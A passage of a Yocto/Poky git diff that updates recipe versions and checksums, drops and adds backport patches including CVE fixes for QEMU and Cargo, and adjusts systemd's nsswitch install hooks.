PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false" PACKAGECONFIG[oomd] = "-Doomd=true,-Doomd=false" @@ -826,15 +826,31 @@ ALTERNATIVE_LINK_NAME[runlevel] = "${base_sbindir}/runlevel" ALTERNATIVE_PRIORITY[runlevel] ?= "300" pkg_postinst:${PN}:libc-glibc () { - sed -e '/^hosts:/s/\s*\<myhostname\>//' \ - -e 's/\(^hosts:.*\)\(\<files\>\)\(.*\)\(\<dns\>\)\(.*\)/\1\2 myhostname \3\4\5/' \ - -i $D${sysconfdir}/nsswitch.conf + if ${@bb.utils.contains('PACKAGECONFIG', 'myhostname', 'true', 'false', d)}; then + sed -e '/^hosts:/s/\s*\<myhostname\>//' \ + -e 's/\(^hosts:.*\)\(\<files\>\)\(.*\)\(\<dns\>\)\(.*\)/\1\2 myhostname \3\4\5/' \ + -i $D${sysconfdir}/nsswitch.conf + fi + if ${@bb.utils.contains('PACKAGECONFIG', 'nss', 'true', 'false', d)}; then + sed -e 's#\(^passwd:.*\)#\1 systemd#' \ + -e 's#\(^group:.*\)#\1 systemd#' \ + -e 's#\(^shadow:.*\)#\1 systemd#' \ + -i $D${sysconfdir}/nsswitch.conf + fi } pkg_prerm:${PN}:libc-glibc () { - sed -e '/^hosts:/s/\s*\<myhostname\>//' \ - -e '/^hosts:/s/\s*myhostname//' \ - -i $D${sysconfdir}/nsswitch.conf + if ${@bb.utils.contains('PACKAGECONFIG', 'myhostname', 'true', 'false', d)}; then + sed -e '/^hosts:/s/\s*\<myhostname\>//' \ + -e '/^hosts:/s/\s*myhostname//' \ + -i $D${sysconfdir}/nsswitch.conf + fi + if ${@bb.utils.contains('PACKAGECONFIG', 'nss', 'true', 'false', d)}; then + sed -e '/^passwd:/s#\s*systemd##' \ + -e '/^group:/s#\s*systemd##' \ + -e '/^shadow:/s#\s*systemd##' \ + -i $D${sysconfdir}/nsswitch.conf + fi } PACKAGE_WRITE_DEPS += "qemu-native" diff --git a/poky/meta/recipes-devtools/binutils/binutils-2.41.inc b/poky/meta/recipes-devtools/binutils/binutils-2.41.inc index b4934c02a8..d4b239258d 100644 --- a/poky/meta/recipes-devtools/binutils/binutils-2.41.inc +++ b/poky/meta/recipes-devtools/binutils/binutils-2.41.inc @@ -18,7 +18,7 @@ SRCBRANCH ?= "binutils-2_41-branch" UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)" -SRCREV ?= "cb4c3555ac4cf8aaf0935cb6e4b09e6882436d21" +SRCREV ?= "e13f70c7fcb2f4a39ddad4ccb83660dbfee2caeb" BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${SRCBRANCH};protocol=https" SRC_URI = "\ ${BINUTILS_GIT_URI} \ diff --git a/poky/meta/recipes-devtools/cmake/cmake-native_3.27.5.bb b/poky/meta/recipes-devtools/cmake/cmake-native_3.27.7.bb index 546d117156..546d117156 100644 --- a/poky/meta/recipes-devtools/cmake/cmake-native_3.27.5.bb +++ b/poky/meta/recipes-devtools/cmake/cmake-native_3.27.7.bb diff --git a/poky/meta/recipes-devtools/cmake/cmake.inc b/poky/meta/recipes-devtools/cmake/cmake.inc index ef4eec5ab1..ecb0e487df 100644 --- a/poky/meta/recipes-devtools/cmake/cmake.inc +++ b/poky/meta/recipes-devtools/cmake/cmake.inc @@ -19,7 +19,7 @@ CMAKE_MAJOR_VERSION = "${@'.'.join(d.getVar('PV').split('.')[0:2])}" SRC_URI = "https://cmake.org/files/v${CMAKE_MAJOR_VERSION}/cmake-${PV}.tar.gz \ " -SRC_URI[sha256sum] = "5175e8fe1ca9b1dd09090130db7201968bcce1595971ff9e9998c2f0765004c9" +SRC_URI[sha256sum] = "08f71a106036bf051f692760ef9558c0577c42ac39e96ba097e7662bd4158d8e" UPSTREAM_CHECK_REGEX = "cmake-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/poky/meta/recipes-devtools/cmake/cmake_3.27.5.bb b/poky/meta/recipes-devtools/cmake/cmake_3.27.7.bb index 6a9a3266df..6a9a3266df 100644 --- a/poky/meta/recipes-devtools/cmake/cmake_3.27.5.bb +++ b/poky/meta/recipes-devtools/cmake/cmake_3.27.7.bb diff --git a/poky/meta/recipes-devtools/json-c/json-c_0.17.bb b/poky/meta/recipes-devtools/json-c/json-c_0.17.bb index f4b7a32cea..20bcece768 100644 --- a/poky/meta/recipes-devtools/json-c/json-c_0.17.bb +++ b/poky/meta/recipes-devtools/json-c/json-c_0.17.bb @@ -17,6 +17,9 @@ UPSTREAM_CHECK_REGEX = "json-c-(?P<pver>\d+(\.\d+)+)-\d+" RPROVIDES:${PN} = "libjson" +# Required for ICECC builds +EXTRA_OECMAKE = "-DDISABLE_WERROR=ON" + inherit cmake ptest do_install_ptest() { diff --git a/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.0.bb b/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.1.bb index e0c16d2e73..be3c787ab2 100644 --- a/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.0.bb +++ b/poky/meta/recipes-devtools/log4cplus/log4cplus_2.1.1.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=41e8e060c26822886b592ab4765c756b" SRC_URI = "${SOURCEFORGE_MIRROR}/project/${BPN}/${BPN}-stable/${PV}/${BP}.tar.gz \ " -SRC_URI[sha256sum] = "2a8eb99d71b0680c0520c7c16248cdb4195da82f396b79fea30b0d9e289c8c72" +SRC_URI[sha256sum] = "42dc435928917fd2f847046c4a0c6086b2af23664d198c7fc1b982c0bfe600c1" UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/log4cplus/files/log4cplus-stable/" UPSTREAM_CHECK_REGEX = "log4cplus-stable/(?P<pver>\d+(\.\d+)+)/" diff --git a/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch b/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch deleted file mode 100644 index 4de4a5b955..0000000000 --- a/poky/meta/recipes-devtools/perl-cross/files/0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch +++ /dev/null @@ -1,28 +0,0 @@ -From 920abf3dc39c851a655b719622c76a6f0dc9981d Mon Sep 17 00:00:00 2001 -From: Alexander Kanavin <alex@linutronix.de> -Date: Tue, 5 Sep 2023 19:47:33 +0200 -Subject: [PATCH] cnf/configure_pfmt.sh: add 32 bit integer format definitions - -These started to matter in perl 5.38 where they are used to print -line numbers. - -Upstream-Status: Submitted [https://github.com/arsv/perl-cross/pull/143] -Signed-off-by: Alexander Kanavin <alex@linutronix.de> ---- - cnf/configure_pfmt.sh | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/cnf/configure_pfmt.sh b/cnf/configure_pfmt.sh -index 8f93da1..7bb4b6f 100644 ---- a/cnf/configure_pfmt.sh -+++ b/cnf/configure_pfmt.sh -@@ -52,3 +52,9 @@ else - define uvxformat '"lx"' - define uvXUformat '"lX"' - fi -+ -+define i32dformat 'PRId32' -+define u32uformat 'PRIu32' -+define u32oformat 'PRIo32' -+define u32xformat 'PRIx32' -+define u32XUformat 'PRIX32' diff --git a/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.bb b/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.2.bb index 7ca4977b97..b41c182fad 100644 --- a/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.bb +++ b/poky/meta/recipes-devtools/perl-cross/perlcross_1.5.2.bb @@ -15,11 +15,10 @@ SRC_URI = "${GITHUB_BASE_URI}/download/${PV}/perl-cross-${PV}.tar.gz;name=perl-c file://0001-perl-cross-add-LDFLAGS-when-linking-libperl.patch \ file://determinism.patch \ file://0001-Makefile-check-the-file-if-patched-or-not.patch \ - file://0001-cnf-configure_pfmt.sh-add-32-bit-integer-format-defi.patch \ " GITHUB_BASE_URI = "https://github.com/arsv/perl-cross/releases/" -SRC_URI[perl-cross.sha256sum] = "d744a390939e2ebb9a12f6725b4d9c19255a141d90031eff90ea183fdfcbf211" +SRC_URI[perl-cross.sha256sum] = "584dc54c48dca25e032b676a15bef377c1fed9de318b4fc140292a5dbf326e90" S = "${WORKDIR}/perl-cross-${PV}" diff --git a/poky/meta/recipes-devtools/perl/perl_5.38.0.bb b/poky/meta/recipes-devtools/perl/perl_5.38.2.bb index 639664e355..a9d684cfc5 100644 --- a/poky/meta/recipes-devtools/perl/perl_5.38.0.bb +++ b/poky/meta/recipes-devtools/perl/perl_5.38.2.bb @@ -26,7 +26,7 @@ SRC_URI:append:class-target = " \ file://encodefix.patch \ " -SRC_URI[perl.sha256sum] = "213ef58089d2f2c972ea353517dc60ec3656f050dcc027666e118b508423e517" +SRC_URI[perl.sha256sum] = "a0a31534451eb7b83c7d6594a497543a54d488bc90ca00f5e34762577f40655e" B = "${WORKDIR}/perl-${PV}-build" diff --git a/poky/meta/recipes-devtools/python/python3-urllib3_2.0.6.bb b/poky/meta/recipes-devtools/python/python3-urllib3_2.0.7.bb index cd2a9dd4ef..c286838086 100644 --- a/poky/meta/recipes-devtools/python/python3-urllib3_2.0.6.bb +++ b/poky/meta/recipes-devtools/python/python3-urllib3_2.0.7.bb @@ -3,7 +3,7 @@ HOMEPAGE = "https://github.com/shazow/urllib3" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=52d273a3054ced561275d4d15260ecda" -SRC_URI[sha256sum] = "b19e1a85d206b56d7df1d5e683df4a7725252a964e3993648dd0fb5a1c157564" +SRC_URI[sha256sum] = "c97dfde1f7bd43a71c8d2a58e369e9b2bf692d1334ea9f9cae55add7d0dd0f84" inherit pypi python_hatchling diff --git a/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch b/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch new file mode 100644 index 0000000000..199031d42a --- /dev/null +++ b/poky/meta/recipes-devtools/python/python3/0001-test_storlines-skip-due-to-load-variability.patch @@ -0,0 +1,32 @@ +From 013ff01fdf2aa6ca69a7c80a2a2996630877e4ea Mon Sep 17 00:00:00 2001 +From: Trevor Gamblin <tgamblin@baylibre.com> +Date: Fri, 6 Oct 2023 10:59:44 -0400 +Subject: [PATCH] test_storlines: skip due to load variability + +This is yet another test that intermittently fails on the Yocto AB when +a worker is under heavy load, so skip it during testing. + +Upstream-Status: Inappropriate [OE-Specific] + +[YOCTO #14933] + +Signed-off-by: Trevor Gamblin <tgamblin@baylibre.com> +--- + Lib/test/test_ftplib.py | 1 + + 1 file changed, 1 insertion(+) + +diff --git a/Lib/test/test_ftplib.py b/Lib/test/test_ftplib.py +index 082a90d46b..508814d56a 100644 +--- a/Lib/test/test_ftplib.py ++++ b/Lib/test/test_ftplib.py +@@ -629,6 +629,7 @@ def test_storbinary_rest(self): + self.client.storbinary('stor', f, rest=r) + self.assertEqual(self.server.handler_instance.rest, str(r)) + ++ @unittest.skip('timing related test, dependent on load') + def test_storlines(self): + data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding) + f = io.BytesIO(data) +-- +2.41.0 + diff --git a/poky/meta/recipes-devtools/python/python3_3.11.5.bb b/poky/meta/recipes-devtools/python/python3_3.11.5.bb index 8e023c7dfb..d375de4b19 100644 --- a/poky/meta/recipes-devtools/python/python3_3.11.5.bb +++ b/poky/meta/recipes-devtools/python/python3_3.11.5.bb @@ -33,6 +33,7 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ file://0001-Avoid-shebang-overflow-on-python-config.py.patch \ file://0001-Update-test_sysconfig-for-posix_user-purelib.patch \ file://0001-skip-no_stdout_fileno-test-due-to-load-variability.patch \ + file://0001-test_storlines-skip-due-to-load-variability.patch \ " SRC_URI:append:class-native = " \ diff --git a/poky/meta/recipes-devtools/qemu/qemu-native_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu-native_8.1.2.bb index 73a0f63f2b..73a0f63f2b 100644 --- a/poky/meta/recipes-devtools/qemu/qemu-native_8.1.0.bb +++ b/poky/meta/recipes-devtools/qemu/qemu-native_8.1.2.bb diff --git a/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.2.bb index 558a416f7b..558a416f7b 100644 --- a/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.0.bb +++ b/poky/meta/recipes-devtools/qemu/qemu-system-native_8.1.2.bb diff --git a/poky/meta/recipes-devtools/qemu/qemu.inc b/poky/meta/recipes-devtools/qemu/qemu.inc index 78c495516f..5ab2cb83b4 100644 --- a/poky/meta/recipes-devtools/qemu/qemu.inc +++ b/poky/meta/recipes-devtools/qemu/qemu.inc @@ -29,18 +29,15 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \ file://0009-Define-MAP_SYNC-and-MAP_SHARED_VALIDATE-on-needed-li.patch \ file://0010-hw-pvrdma-Protect-against-buggy-or-malicious-guest-d.patch \ file://0002-linux-user-Replace-use-of-lfs64-related-functions-an.patch \ - file://0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch \ - file://0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch \ file://fixedmeson.patch \ file://fixmips.patch \ file://qemu-guest-agent.init \ file://qemu-guest-agent.udev \ - file://CVE-2023-42467.patch \ " UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar" -SRC_URI[sha256sum] = "710c101198e334d4762eef65f649bc43fa8a5dd75303554b8acfec3eb25f0e55" +SRC_URI[sha256sum] = "541526a764576eb494d2ff5ec46aeb253e62ea29035d1c23c0a8af4e6cd4f087" SRC_URI:append:class-target = " file://cross.patch" SRC_URI:append:class-nativesdk = " file://cross.patch" diff --git a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch b/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch deleted file mode 100644 index 7380e16ab3..0000000000 --- a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Assert-data-in-bounds-in-iotlb_to_section.patch +++ /dev/null @@ -1,42 +0,0 @@ -From 86e4f93d827d3c1efd00cd8a906e38a2c0f2b5bc Mon Sep 17 00:00:00 2001 -From: Richard Henderson <richard.henderson@linaro.org> -Date: Fri, 25 Aug 2023 14:06:58 -0700 -Subject: [PATCH] softmmu: Assert data in bounds in iotlb_to_section -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -Acked-by: Alex Bennée <alex.bennee@linaro.org> -Suggested-by: Alex Bennée <alex.bennee@linaro.org> -Signed-off-by: Richard Henderson <richard.henderson@linaro.org> - -Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/86e4f93d827d3c1efd00cd8a906e38a2c0f2b5bc] ---- - softmmu/physmem.c | 10 ++++++++-- - 1 file changed, 8 insertions(+), 2 deletions(-) - -diff --git a/softmmu/physmem.c b/softmmu/physmem.c -index 3df73542e1..7597dc1c39 100644 ---- a/softmmu/physmem.c -+++ b/softmmu/physmem.c -@@ -2413,9 +2413,15 @@ MemoryRegionSection *iotlb_to_section(CPUState *cpu, - int asidx = cpu_asidx_from_attrs(cpu, attrs); - CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx]; - AddressSpaceDispatch *d = qatomic_rcu_read(&cpuas->memory_dispatch); -- MemoryRegionSection *sections = d->map.sections; -+ int section_index = index & ~TARGET_PAGE_MASK; -+ MemoryRegionSection *ret; -+ -+ assert(section_index < d->map.sections_nb); -+ ret = d->map.sections + section_index; -+ assert(ret->mr); -+ assert(ret->mr->ops); - -- return §ions[index & ~TARGET_PAGE_MASK]; -+ return ret; - } - - static void io_mem_init(void) --- -2.34.1 - diff --git a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch b/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch deleted file mode 100644 index 8289b45991..0000000000 --- a/poky/meta/recipes-devtools/qemu/qemu/0001-softmmu-Use-async_run_on_cpu-in-tcg_commit.patch +++ /dev/null @@ -1,157 +0,0 @@ -From 0d58c660689f6da1e3feff8a997014003d928b3b Mon Sep 17 00:00:00 2001 -From: Richard Henderson <richard.henderson@linaro.org> -Date: Fri, 25 Aug 2023 16:13:17 -0700 -Subject: [PATCH] softmmu: Use async_run_on_cpu in tcg_commit -MIME-Version: 1.0 -Content-Type: text/plain; charset=UTF-8 -Content-Transfer-Encoding: 8bit - -After system startup, run the update to memory_dispatch -and the tlb_flush on the cpu. This eliminates a race, -wherein a running cpu sees the memory_dispatch change -but has not yet seen the tlb_flush. - -Since the update now happens on the cpu, we need not use -qatomic_rcu_read to protect the read of memory_dispatch. - -Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1826 -Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1834 -Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1846 -Tested-by: Alex Bennée <alex.bennee@linaro.org> -Reviewed-by: Alex Bennée <alex.bennee@linaro.org> -Signed-off-by: Richard Henderson <richard.henderson@linaro.org> - -Upstream-Status: Backport [0d58c660689f6da1e3feff8a997014003d928b3b] ---- - accel/tcg/cpu-exec-common.c | 30 ---------------------------- - include/exec/cpu-common.h | 1 - - softmmu/physmem.c | 40 +++++++++++++++++++++++++++---------- - 3 files changed, 29 insertions(+), 42 deletions(-) - -Index: qemu-8.1.0/accel/tcg/cpu-exec-common.c -=================================================================== ---- qemu-8.1.0.orig/accel/tcg/cpu-exec-common.c -+++ qemu-8.1.0/accel/tcg/cpu-exec-common.c -@@ -33,36 +33,6 @@ void cpu_loop_exit_noexc(CPUState *cpu) - cpu_loop_exit(cpu); - } - --#if defined(CONFIG_SOFTMMU) --void cpu_reloading_memory_map(void) --{ -- if (qemu_in_vcpu_thread() && current_cpu->running) { -- /* The guest can in theory prolong the RCU critical section as long -- * as it feels like. The major problem with this is that because it -- * can do multiple reconfigurations of the memory map within the -- * critical section, we could potentially accumulate an unbounded -- * collection of memory data structures awaiting reclamation. -- * -- * Because the only thing we're currently protecting with RCU is the -- * memory data structures, it's sufficient to break the critical section -- * in this callback, which we know will get called every time the -- * memory map is rearranged. -- * -- * (If we add anything else in the system that uses RCU to protect -- * its data structures, we will need to implement some other mechanism -- * to force TCG CPUs to exit the critical section, at which point this -- * part of this callback might become unnecessary.) -- * -- * This pair matches cpu_exec's rcu_read_lock()/rcu_read_unlock(), which -- * only protects cpu->as->dispatch. Since we know our caller is about -- * to reload it, it's safe to split the critical section. -- */ -- rcu_read_unlock(); -- rcu_read_lock(); -- } --} --#endif -- - void cpu_loop_exit(CPUState *cpu) - { - /* Undo the setting in cpu_tb_exec. */ -Index: qemu-8.1.0/include/exec/cpu-common.h -=================================================================== ---- qemu-8.1.0.orig/include/exec/cpu-common.h -+++ qemu-8.1.0/include/exec/cpu-common.h -@@ -133,7 +133,6 @@ static inline void cpu_physical_memory_w - { - cpu_physical_memory_rw(addr, (void *)buf, len, true); - } --void cpu_reloading_memory_map(void); - void *cpu_physical_memory_map(hwaddr addr, - hwaddr *plen, - bool is_write); -Index: qemu-8.1.0/softmmu/physmem.c -=================================================================== ---- qemu-8.1.0.orig/softmmu/physmem.c -+++ qemu-8.1.0/softmmu/physmem.c -@@ -680,8 +680,7 @@ address_space_translate_for_iotlb(CPUSta - IOMMUTLBEntry iotlb; - int iommu_idx; - hwaddr addr = orig_addr; -- AddressSpaceDispatch *d = -- qatomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch); -+ AddressSpaceDispatch *d = cpu->cpu_ases[asidx].memory_dispatch; - - for (;;) { - section = address_space_translate_internal(d, addr, &addr, plen, false); -@@ -2412,7 +2411,7 @@ MemoryRegionSection *iotlb_to_section(CP - { - int asidx = cpu_asidx_from_attrs(cpu, attrs); - CPUAddressSpace *cpuas = &cpu->cpu_ases[asidx]; -- AddressSpaceDispatch *d = qatomic_rcu_read(&cpuas->memory_dispatch); -+ AddressSpaceDispatch *d = cpuas->memory_dispatch; - int section_index = index & ~TARGET_PAGE_MASK; - MemoryRegionSection *ret; - -@@ -2487,23 +2486,42 @@ static void tcg_log_global_after_sync(Me - } - } - -+static void tcg_commit_cpu(CPUState *cpu, run_on_cpu_data data) -+{ -+ CPUAddressSpace *cpuas = data.host_ptr; -+ -+ cpuas->memory_dispatch = address_space_to_dispatch(cpuas->as); -+ tlb_flush(cpu); -+} -+ - static void tcg_commit(MemoryListener *listener) - { - CPUAddressSpace *cpuas; -- AddressSpaceDispatch *d; -+ CPUState *cpu; - - assert(tcg_enabled()); - /* since each CPU stores ram addresses in its TLB cache, we must - reset the modified entries */ - cpuas = container_of(listener, CPUAddressSpace, tcg_as_listener); -- cpu_reloading_memory_map(); -- /* The CPU and TLB are protected by the iothread lock. -- * We reload the dispatch pointer now because cpu_reloading_memory_map() -- * may have split the RCU critical section. -+ cpu = cpuas->cpu; -+ -+ /* -+ * Defer changes to as->memory_dispatch until the cpu is quiescent. -+ * Otherwise we race between (1) other cpu threads and (2) ongoing -+ * i/o for the current cpu thread, with data cached by mmu_lookup(). -+ * -+ * In addition, queueing the work function will kick the cpu back to -+ * the main loop, which will end the RCU critical section and reclaim -+ * the memory data structures. -+ * -+ * That said, the listener is also called during realize, before -+ * all of the tcg machinery for run-on is initialized: thus halt_cond. - */ -- d = address_space_to_dispatch(cpuas->as); -- qatomic_rcu_set(&cpuas->memory_dispatch, d); -- tlb_flush(cpuas->cpu); -+ if (cpu->halt_cond) { -+ async_run_on_cpu(cpu, tcg_commit_cpu, RUN_ON_CPU_HOST_PTR(cpuas)); -+ } else { -+ tcg_commit_cpu(cpu, RUN_ON_CPU_HOST_PTR(cpuas)); -+ } - } - - static void memory_map_init(void) diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch deleted file mode 100644 index 86ab7cf81a..0000000000 --- a/poky/meta/recipes-devtools/qemu/qemu/CVE-2023-42467.patch +++ /dev/null @@ -1,49 +0,0 @@ -From 7cfcc79b0ab800959716738aff9419f53fc68c9c Mon Sep 17 00:00:00 2001 -From: Thomas Huth <thuth@redhat.com> -Date: Thu, 5 Oct 2023 06:01:10 +0000 -Subject: [PATCH] hw/scsi/scsi-disk: Disallow block sizes smaller than 512 - [CVE-2023-42467] - -We are doing things like - - nb_sectors /= (s->qdev.blocksize / BDRV_SECTOR_SIZE); - -in the code here (e.g. in scsi_disk_emulate_mode_sense()), so if -the blocksize is smaller than BDRV_SECTOR_SIZE (=512), this crashes -with a division by 0 exception. Thus disallow block sizes of 256 -bytes to avoid this situation. - -Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1813 -CVE: 2023-42467 -Signed-off-by: Thomas Huth <thuth@redhat.com> -Message-ID: <20230925091854.49198-1-thuth@redhat.com> -Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> - -CVE: CVE-2023-42467 - -Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/7cfcc79b0ab800959716738aff9419f53fc68c9c] - -Signed-off-by: Yogita Urade <yogita.urade@windriver.com> ---- - hw/scsi/scsi-disk.c | 5 +++-- - 1 file changed, 3 insertions(+), 2 deletions(-) - -diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c -index e0d79c796..477ee2bcd 100644 ---- a/hw/scsi/scsi-disk.c -+++ b/hw/scsi/scsi-disk.c -@@ -1628,9 +1628,10 @@ static void scsi_disk_emulate_mode_select(SCSIDiskReq *r, uint8_t *inbuf) - * Since the existing code only checks/updates bits 8-15 of the block - * size, restrict ourselves to the same requirement for now to ensure - * that a block size set by a block descriptor and then read back by -- * a subsequent SCSI command will be the same -+ * a subsequent SCSI command will be the same. Also disallow a block -+ * size of 256 since we cannot handle anything below BDRV_SECTOR_SIZE. - */ -- if (bs && !(bs & ~0xff00) && bs != s->qdev.blocksize) { -+ if (bs && !(bs & ~0xfe00) && bs != s->qdev.blocksize) { - s->qdev.blocksize = bs; - trace_scsi_disk_mode_select_set_blocksize(s->qdev.blocksize); - } --- -2.40.0 diff --git a/poky/meta/recipes-devtools/qemu/qemu_8.1.0.bb b/poky/meta/recipes-devtools/qemu/qemu_8.1.2.bb index 84ee0bcc49..84ee0bcc49 100644 --- a/poky/meta/recipes-devtools/qemu/qemu_8.1.0.bb +++ b/poky/meta/recipes-devtools/qemu/qemu_8.1.2.bb diff --git a/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch b/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch new file mode 100644 index 0000000000..bf9b251226 --- /dev/null +++ b/poky/meta/recipes-devtools/rust/files/0002-CVE-2023-40030.patch @@ -0,0 +1,412 @@ +Author: Eric Huss <eric@huss.org> +Date: Sun Jun 11 12:52:25 2023 -0700 + + Convert valid feature name warning to an error. + +Upstream-Status: Backport [https://github.com/rust-lang/cargo/commit/9835622853f08be9a4b58ebe29dcec8f43b64b33] +CVE: CVE-2023-40030 +Signed-off-by: Deepthi Hemraj <Deepthi.Hemraj@windriver.com> + +diff --git a/src/tools/cargo/crates/resolver-tests/src/lib.rs b/src/tools/cargo/crates/resolver-tests/src/lib.rs +index 01d9b5e6d..ab34e8663 100644 +--- a/src/tools/cargo/crates/resolver-tests/src/lib.rs ++++ b/src/tools/cargo/crates/resolver-tests/src/lib.rs +@@ -179,7 +179,6 @@ pub fn resolve_with_config_raw( + used: HashSet::new(), + }; + let summary = Summary::new( +- config, + pkg_id("root"), + deps, + &BTreeMap::new(), +@@ -581,7 +580,6 @@ pub fn pkg_dep<T: ToPkgId>(name: T, dep: Vec<Dependency>) -> Summary { + None + }; + Summary::new( +- &Config::default().unwrap(), + name.to_pkgid(), + dep, + &BTreeMap::new(), +@@ -610,7 +608,6 @@ pub fn pkg_loc(name: &str, loc: &str) -> Summary { + None + }; + Summary::new( +- &Config::default().unwrap(), + pkg_id_loc(name, loc), + Vec::new(), + &BTreeMap::new(), +@@ -625,7 +622,6 @@ pub fn remove_dep(sum: &Summary, ind: usize) -> Summary { + deps.remove(ind); + // note: more things will need to be copied over in the future, but it works for now. + Summary::new( +- &Config::default().unwrap(), + sum.package_id(), + deps, + &BTreeMap::new(), +diff --git a/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs b/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs +index 002f11ff8..bf26d0498 100644 +--- a/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs ++++ b/src/tools/cargo/src/cargo/core/resolver/version_prefs.rs +@@ -73,7 +73,6 @@ impl VersionPreferences { + mod test { + use super::*; + use crate::core::SourceId; +- use crate::util::Config; + use std::collections::BTreeMap; + + fn pkgid(name: &str, version: &str) -> PackageId { +@@ -90,9 +89,8 @@ mod test { + + fn summ(name: &str, version: &str) -> Summary { + let pkg_id = pkgid(name, version); +- let config = Config::default().unwrap(); + let features = BTreeMap::new(); +- Summary::new(&config, pkg_id, Vec::new(), &features, None::<&String>).unwrap() ++ Summary::new(pkg_id, Vec::new(), &features, None::<&String>).unwrap() + } + + fn describe(summaries: &Vec<Summary>) -> String { + +diff --git a/src/tools/cargo/src/cargo/core/summary.rs b/src/tools/cargo/src/cargo/core/summary.rs +index 2535c4482..1883df33b 100644 +--- a/src/tools/cargo/src/cargo/core/summary.rs ++++ b/src/tools/cargo/src/cargo/core/summary.rs +@@ -1,6 +1,6 @@ + use crate::core::{Dependency, PackageId, SourceId}; + use crate::util::interning::InternedString; +-use crate::util::{CargoResult, Config}; ++use crate::util::CargoResult; + use anyhow::bail; + use semver::Version; + use std::collections::{BTreeMap, HashMap, HashSet}; +@@ -30,7 +30,6 @@ struct Inner { + + impl Summary { + pub fn new( +- config: &Config, + pkg_id: PackageId, + dependencies: Vec<Dependency>, + features: &BTreeMap<InternedString, Vec<InternedString>>, +@@ -49,7 +48,7 @@ impl Summary { + ) + } + } +- let feature_map = build_feature_map(config, pkg_id, features, &dependencies)?; ++ let feature_map = build_feature_map(pkg_id, features, &dependencies)?; + Ok(Summary { + inner: Rc::new(Inner { + package_id: pkg_id, +@@ -140,7 +139,6 @@ impl Hash for Summary { + /// Checks features for errors, bailing out a CargoResult:Err if invalid, + /// and creates FeatureValues for each feature. + fn build_feature_map( +- config: &Config, + pkg_id: PackageId, + features: &BTreeMap<InternedString, Vec<InternedString>>, + dependencies: &[Dependency], +@@ -204,7 +202,7 @@ fn build_feature_map( + feature + ); + } +- validate_feature_name(config, pkg_id, feature)?; ++ validate_feature_name(pkg_id, feature)?; + for fv in fvs { + // Find data for the referenced dependency... + let dep_data = { +@@ -431,33 +429,63 @@ impl fmt::Display for FeatureValue { + + pub type FeatureMap = BTreeMap<InternedString, Vec<FeatureValue>>; + +-fn validate_feature_name(config: &Config, pkg_id: PackageId, name: &str) -> CargoResult<()> { ++fn validate_feature_name(pkg_id: PackageId, name: &str) -> CargoResult<()> { + let mut chars = name.chars(); +- const FUTURE: &str = "This was previously accepted but is being phased out; \ +- it will become a hard error in a future release.\n\ +- For more information, see issue #8813 <https://github.com/rust-lang/cargo/issues/8813>, \ +- and please leave a comment if this will be a problem for your project."; + if let Some(ch) = chars.next() { + if !(unicode_xid::UnicodeXID::is_xid_start(ch) || ch == '_' || ch.is_digit(10)) { +- config.shell().warn(&format!( ++ bail!( + "invalid character `{}` in feature `{}` in package {}, \ + the first character must be a Unicode XID start character or digit \ +- (most letters or `_` or `0` to 